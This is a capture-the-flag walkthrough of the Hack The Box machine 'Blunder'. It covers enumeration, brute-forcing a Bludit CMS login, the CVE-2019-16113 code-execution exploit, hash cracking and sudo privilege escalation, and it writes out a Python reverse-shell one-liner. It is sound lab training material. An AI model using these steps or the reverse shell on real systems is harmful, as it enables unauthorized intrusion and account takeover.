# Blunder ## Information: * Os: Linux * Difficulty: Easy * IP : 10.10.10.191 ## Enumaration NMAP > nmap -sC -sS -sV -O -A -v -v 10.10.10.191 output : ``` PORT STATE SERVICE REASON VERSION 21/tcp closed ftp reset ttl 63 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA |_http-generator: Blunder | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts ``` let's check the website (apache2 running on port 80) ![image](https://user-images.githubusercontent.com/53917092/94908306-dbca0000-0477-11eb-86b0-3344ea6c0187.png) apparently is a site about interesting facts looking at the page source code we will have : ![image](https://user-images.githubusercontent.com/53917092/94908933-c5707400-0478-11eb-8486-a10699c717da.png) and this caught my attention : ![](https://user-images.githubusercontent.com/53917092/94909079-01a3d480-0479-11eb-8c15-6d81d2c6bce1.png) we know the version is 3.9.2, but we need to find out which is the CMS making a fuzzing we found some files with the name "bl-kernel" searching over this structure I found : ![image](https://user-images.githubusercontent.com/53917092/94910942-c9ea5c00-047b-11eb-8b4a-8e779842f1ca.png) ok, the site is made in bludit 3.9.2 ![image](https://user-images.githubusercontent.com/53917092/94911550-b2f83980-047c-11eb-929c-a93283949f78.png) we can try to use an exploit from CVE-2019-16113, and get a RCE (Remote Code Execution) BUT this exploit needs the user and password, which we do not know so let's find out for this, we can use : ![image](https://user-images.githubusercontent.com/53917092/94912365-eedfce80-047d-11eb-815d-b71854bbe5ee.png) code: this code takes a wordlist and tests all the words to find the password but, we still need the user... we return to the enumeration stage, we can find a file named "todo.txt". ![](https://user-images.githubusercontent.com/53917092/94913801-4121ef00-0480-11eb-9699-fee431f23d1b.png) now we know that there is a user called fergus now let's test the passwords but to generate a list of passwords that makes sense, I will use a tool called "cewl", which takes the words of a site and assembles a list > cewl 10.10.10.191 -w wordlist.txt ![](https://user-images.githubusercontent.com/53917092/94914325-3451cb00-0481-11eb-9ef1-0181e9c90e33.png) now let's use that code to find out the password > python3 10.10.191 fergus wordlist.txt ![](https://user-images.githubusercontent.com/53917092/94914692-dffb1b00-0481-11eb-96db-6113f67f0615.png) ![](https://user-images.githubusercontent.com/53917092/94915471-58161080-0483-11eb-8a9a-346f0e508273.png) finally, we have the password, now use the exploit from CVE-2019-16113 ## Getting Shell ![](https://user-images.githubusercontent.com/53917092/94916228-abd52980-0484-11eb-80eb-692e4106b982.png) ![](https://user-images.githubusercontent.com/53917092/94916325-e0e17c00-0484-11eb-9363-25d8843cd081.png) ![](https://user-images.githubusercontent.com/53917092/94916508-2b62f880-0485-11eb-974e-a2c2eed20340.png) ![](https://user-images.githubusercontent.com/53917092/94916617-65cc9580-0485-11eb-936c-f74dfa19cff5.png) now we have a shell, but very bad ### improving this shell to improve this shell, we will make this connection start another shell, for this we will use : ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` (changing the ip) ![](https://user-images.githubusercontent.com/53917092/94917382-d0320580-0486-11eb-9539-88e8bd9e5e22.png) (on the right screen we have the good shell, but not a tty) to have a tty, run the command : > python -c 'import pty;pty.spawn("/bin/bash")' now we have to try to get access to some users (www-data don't have access to the user flag) looking for files in the www-data, I found > /var/www/bludit-3.10.0a/bl-content/databases/users.php [![image](https://user-images.githubusercontent.com/53917092/94918936-ebeadb00-0489-11eb-98e1-24c1badcff20.png)](https://user-images.githubusercontent.com/53917092/94918936-ebeadb00-0489-11eb-98e1-24c1badcff20.png) here we see the user (hugo) and the encrypted password now let's break the password encryption we need to find out which encryption was used for this I will use a site called tunnelsup ![](https://user-images.githubusercontent.com/53917092/94919144-57cd4380-048a-11eb-8dc3-59600f1b87bc.png) breaking ( ) : ![](https://user-images.githubusercontent.com/53917092/94919344-b85c8080-048a-11eb-8135-c83bce488770.png) now we have the password, let's change our user ![](https://user-images.githubusercontent.com/53917092/94919514-fb1e5880-048a-11eb-8a0d-1b0de989c0ea.png) ## Privilege Escalation running > sudo -l to see what command we can run as root without password, we see that the hugo user can use the command "(ALL, !root) /bin/bash" ![](https://user-images.githubusercontent.com/53917092/115265571-bd72db80-a10d-11eb-8891-59a771a2000f.png) searching for about this, we see that there is an exploit to escalate the privilege ![](https://user-images.githubusercontent.com/53917092/94922594-e47b0000-0490-11eb-87dd-578465479847.png) Let's use it I will download the script to my machine, and start a python http server in my folder, so in the target machine, I can download it from my ip. ![](https://user-images.githubusercontent.com/53917092/94922852-49cef100-0491-11eb-86b7-8a5b96b3ff7e.png) now we are root, just catch the flag. [![image](https://user-images.githubusercontent.com/53917092/94922938-6ec36400-0491-11eb-9a63-c5b123fe0a4d.png)](https://user-images.githubusercontent.com/53917092/94922938-6ec36400-0491-11eb-9a63-c5b123fe0a4d.png)